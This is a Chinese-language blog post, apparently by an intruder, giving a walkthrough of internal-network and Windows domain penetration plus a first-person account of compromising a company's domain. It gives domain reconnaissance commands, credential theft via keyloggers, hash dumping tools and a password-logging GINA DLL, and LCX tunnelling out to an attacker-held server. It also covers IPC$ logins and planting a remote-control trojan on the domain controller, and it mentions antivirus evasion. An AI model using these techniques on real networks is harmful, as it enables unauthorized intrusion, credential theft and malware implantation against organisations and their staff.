相對(duì)來說，網(wǎng)上的資料少之又少，很少有人對(duì)內(nèi)網(wǎng)滲透寫出一些詳細(xì)的資料以供同行們參考。今天在這，只是大致的講一下內(nèi)網(wǎng)的一些知識(shí)。

首先，我們會(huì)在什么情況下遇見內(nèi)網(wǎng)?如果你的目標(biāo)只局限于一個(gè)小WEB，那你完全不用考慮內(nèi)網(wǎng)了。但是，如果你的目標(biāo)是一個(gè)大WEB，或者一個(gè)大公司，那你就必須考慮內(nèi)網(wǎng)的問題。

在我們的滲透過程中，很多大型網(wǎng)絡(luò)的外部網(wǎng)站或是服務(wù)器不一定有用，當(dāng)然外網(wǎng)也可以作為我們的一個(gè)突破口，畢竟沒有經(jīng)過嘗試，我們也不知道里面的結(jié)構(gòu)，至少在外部上我們可以獲取一定的

信息也說不定，但是對(duì)于內(nèi)網(wǎng)，外網(wǎng)絕對(duì)不是我們的主要路徑。很多時(shí)候我們直接從外網(wǎng)入手，想進(jìn)入內(nèi)網(wǎng)，已變得越來越困難。

那就對(duì)內(nèi)網(wǎng)，我們應(yīng)該怎樣做呢?有些什么可利用的?或者有些什么方法?下面，我們就來一起討論下。

滲透，本身就是一個(gè)信息收集，然后分類歸檔，技術(shù)利用，從而達(dá)到目標(biāo)。

那我們拿到一個(gè)內(nèi)網(wǎng)的機(jī)器時(shí)，我們首要要做的事情就是要進(jìn)入信息的收集，什么信息?很多…

1、收集信息。

1-1、不論什么途徑獲得的內(nèi)網(wǎng)機(jī)器，確定他在內(nèi)網(wǎng)后，我們首先就要了解這臺(tái)機(jī)器的所屬人員，如果我們的目標(biāo)是公司，那我們就要了解這個(gè)人在公司里的職位，他是個(gè)什么身份，有多大的權(quán)利， 這都關(guān)系到他在內(nèi)網(wǎng)里的權(quán)限。因?yàn)椋鳛榇蠊荆粋€(gè)高權(quán)限的人他在內(nèi)網(wǎng)里所要用到的東西就多，那么相對(duì)他的機(jī)器，當(dāng)然權(quán)限就會(huì)比一般普通員工的高很多，這在我的滲透過程中是常見的。

既然有了他的機(jī)器，那么翻翻他的電腦這是必要的，如果你說要怎么翻，你可以嘗試熟悉他的電腦甚至比他本人還熟，那你就算了解詳細(xì)了。一臺(tái)個(gè)人用的電腦，從上面翻出與他自己相關(guān)的一些信息，和大量公司信息應(yīng)該是沒有問題的，除非，這是臺(tái)新電腦。

1-2、了解了一定的人員信息，期間你要記下你所掌握到的賬號(hào)，密碼這些重要數(shù)據(jù)，以后有一定的用，所以，在你滲透之前，不妨建個(gè)記事本將重要信息保存起來，寫個(gè)記事本不會(huì)浪費(fèi)你多少時(shí)間。

接下來，我們就應(yīng)該對(duì)這個(gè)網(wǎng)絡(luò)進(jìn)行一定的了解，他是一般的內(nèi)網(wǎng)，還是域?一般大公司都會(huì)用域的，我們只需要查一下就知道，要想對(duì)他進(jìn)行滲透，你就必須了解他的網(wǎng)絡(luò)拓?fù)?，?dāng)然，一些太具體的物理上我們是無法了解的，我們只能了解我們所能知道的。不管他是INT，DMZ，LAN，我們必須足夠掌握。在這，我們就會(huì)用到一定的命令，相信大家應(yīng)該都很熟悉。

ipconfig /all 查詢一下本機(jī)的一些情況，IP段 網(wǎng)關(guān) 屬于不屬于域

net view 查詢一些存在聯(lián)系的機(jī)器，一般以機(jī)器名顯示，我們需要對(duì)其PING出IP，一是方便查詢哪些重要機(jī)器的IP，二是方便查詢存在幾個(gè)段

net view /domain 查詢有幾個(gè)域 因?yàn)榇笮途W(wǎng)絡(luò)里面一般不止一個(gè)域的

net group /domain 查詢域里面的組

net user /domain 查詢域用戶

net group “domain admins” /domain 查詢域管理用戶組

這些都是我們需要了解的，當(dāng)然有時(shí)候還會(huì)需要再查詢一些信息，NET命令下你們都會(huì)找到，不需要我再重復(fù)，具體的情況具體分析問題。

2、信息歸檔

2-1、有了信息，我們就要對(duì)信息進(jìn)行一定的歸檔，將每個(gè)機(jī)器名所對(duì)應(yīng)的IP歸檔，方便用時(shí)不會(huì)亂。

2-2、查詢出的用戶，管理員，我們也必須歸檔。

2-3、查詢信息時(shí)可能出現(xiàn)的有利用價(jià)值信息必須歸檔。

3、技術(shù)利用

3-1、不論是通過鍵盤記錄。或者HASH的抓取，我們需要將賬號(hào)，密碼，郵箱，凡是涉及關(guān)鍵數(shù)據(jù)的全部保存，一方面是準(zhǔn)備滲透的資料，二是防止當(dāng)前利用機(jī)器會(huì)掉。

3-1-1、利用遠(yuǎn)控的鍵盤記錄進(jìn)行抓取。

3-1-2、利用PWDUMP7或者GETHASHES進(jìn)行抓取HASH，然后破解。GETHASHES V1。4后 可以抓取域的全部HASH。

3-1-3、用GINASTUB。DLL獲取管理員的賬號(hào)和密碼。因?yàn)橛蚬芾韱T有權(quán)限登陸任何一臺(tái)機(jī)器。種上這個(gè)只是方便記錄他所登陸的密碼。INSTALL后，會(huì)在SYSYTEM32下生成一個(gè) FAXMODE。INC 文件記錄密碼。

3-2、有了內(nèi)網(wǎng)，很多東西我們是沒有必要直接在當(dāng)前利用機(jī)器上操作的，別人雖然是內(nèi)網(wǎng)，但是不代表他沒有防御系統(tǒng)，所以，我們建立SOCKS或者VPN是很有必要的，建立SOCKS相信大家都會(huì)了吧。

3-2-1、我在這推薦 VIDC 這個(gè)工具，很方便，在CMD下直接操 VIDC。EXE -D -P PORT 就可以了。

3-2-2、在利用機(jī)器上使用LCX，CMD下 LCX。EXE -SLAVE 服務(wù)器IP PORT 127。0。0。1 PORT，然后到服務(wù)器上CMD下 LCX。EXE -LISTEN 服務(wù)器IP PORT 任意PORT。

3-2-3、建立SOCKS后在本地可以用SOCKSCAP來進(jìn)行連接，成功連接后該操作什么就看你們自己了。

基本上我們就只能操作這么多了，后面已經(jīng)沒有什么技術(shù)上的再使用或利用，但是這中間的經(jīng)驗(yàn)不少，所需要處理的細(xì)節(jié)也不少。

我們?cè)诘玫絻?nèi)網(wǎng)機(jī)器后，如果他存在域，但是沒有使用域賬號(hào)怎么辦?那我們只能查詢或者想盡一切手段獲得他常用的賬號(hào)密碼，然后利用這個(gè)賬號(hào)密碼，再通過SOCKS進(jìn)入域。這其中就關(guān)系到各位 同行查看控制機(jī)器的文件，還有記錄密碼，GINA，HASH破解，這些都是必須的。

進(jìn)入域后，我們又該怎么做，建立SOCKS后又該怎么做。我們可以扔S上去查看主要的端口，我們可以對(duì)端口進(jìn)行弱口令的嘗試，我們可以針對(duì)內(nèi)網(wǎng)的WEB進(jìn)行檢測(cè)，方式很多，甚至你可以用MS08-067 對(duì)另一臺(tái)機(jī)器進(jìn)行突破，但是相信我，能使用域的機(jī)器，大部分都是補(bǔ)丁打齊的。我們能利用的很少，但是不能灰心，只要能在內(nèi)網(wǎng)穿梭，我們至少在防御上會(huì)輕松很多，我們需要的只是耐心和時(shí)間。

一旦擁有密碼，我們就可以嘗試IPC連接，直接拿下域，這就得看你們的權(quán)限有多大。

net use \IPipc$ password /user:username@domain

推薦使用這樣的方式輸入賬號(hào)和密碼，為什么?如果用戶名存在空格，你這樣輸會(huì)保險(xiǎn)些。什么 域用戶不能存在空格?

是的，以前我也認(rèn)為不會(huì)，微軟的講師也說不會(huì)，不過，經(jīng)過我的測(cè)試和經(jīng)驗(yàn)，那是假的，域 完全可以空格，除了user name 這樣的，還可以存在 user na me ，不信你可以試試。建立IPC后，你只是想COPY文件或者 RAR文件再或者種馬 那就是你的自由了。

后話:最近因?yàn)樵跐B域，在滲透過程中，也確實(shí)出現(xiàn)一些問題，幾次都是不知如何進(jìn)行，其實(shí)在技術(shù)上，并沒有什么障礙。主要是在于對(duì)方有著比較強(qiáng)的主防御，而我的遠(yuǎn)控最開始連CMD都無法執(zhí)行， 后經(jīng)過幾天的環(huán)境測(cè)試，突破了CMD。有了CMD后，進(jìn)行了查詢，獲得了一些信息，就開始了往下的滲透，被控機(jī)器的密碼我不是跑出來的，我是翻他的文件翻出他常用密碼的。因?yàn)樗麤]有使用域賬號(hào)， 都是以系統(tǒng)賬號(hào)登陸，所以無法查看域。我只能用他的域賬號(hào)建立IPC連接，查找到內(nèi)網(wǎng)的一個(gè)WEB服務(wù)，將其滲透后才算拿下了一個(gè)穩(wěn)定的內(nèi)網(wǎng)機(jī)器。

拿下內(nèi)網(wǎng)WEB服務(wù)器后，我就已經(jīng)完全在域內(nèi)，沒有使用HASH INJECTION，我是先查詢了DOMAIN ADMINS，發(fā)現(xiàn)WEB服務(wù)器上的賬號(hào)就屬于這個(gè)組，PW后得到了HASH，破解掉我就連向了域控服務(wù)器的 IPC$。

連接了IPC$，直接在其SYSYTEM32下扔了一個(gè)遠(yuǎn)控，然后用AT命令將其啟動(dòng)，這期間我嘗試了5個(gè)SHIFT，但是SHIFT關(guān)閉后，我的遠(yuǎn)控也會(huì)掉，所以排除了這種方法，還是用AT來ADD NEW JOB 比較方便 。

給域控服務(wù)器種了遠(yuǎn)控，利用CMD來GETHASHES了全部的HASHES進(jìn)行破解，很幸運(yùn)的查到了文件管理組的用戶，這才有了我后面的目標(biāo)達(dá)成。

總的來說，我這次的滲透比較運(yùn)氣好，中間麻煩事不是太多，不過也花了半個(gè)月的時(shí)間，時(shí)間大部分花在測(cè)試防御環(huán)境，軟件免殺，木馬免殺，查找資料這些上面。

后來，我獲取了他的網(wǎng)絡(luò)拓補(bǔ)圖，發(fā)現(xiàn)我所呆的區(qū)域只是一個(gè)小小的域，還有好幾個(gè)域我還沒有涉及到，在域的前面是DMZ，而DMZ前面當(dāng)然是INT了。

已經(jīng)很晚了，本來是在寫一份詳細(xì)的滲透過程，不過因?yàn)橐恢惫ぷ鳎芏嗉?xì)節(jié)沒有辦法當(dāng)場(chǎng)記錄，所以，暫時(shí)在BLOG上寫一些能想到的，后面如果有時(shí)間有環(huán)境，會(huì)再補(bǔ)充更多的細(xì)節(jié)以及圖片和在滲 透時(shí)所遇到的麻煩，如何解決等寫出來。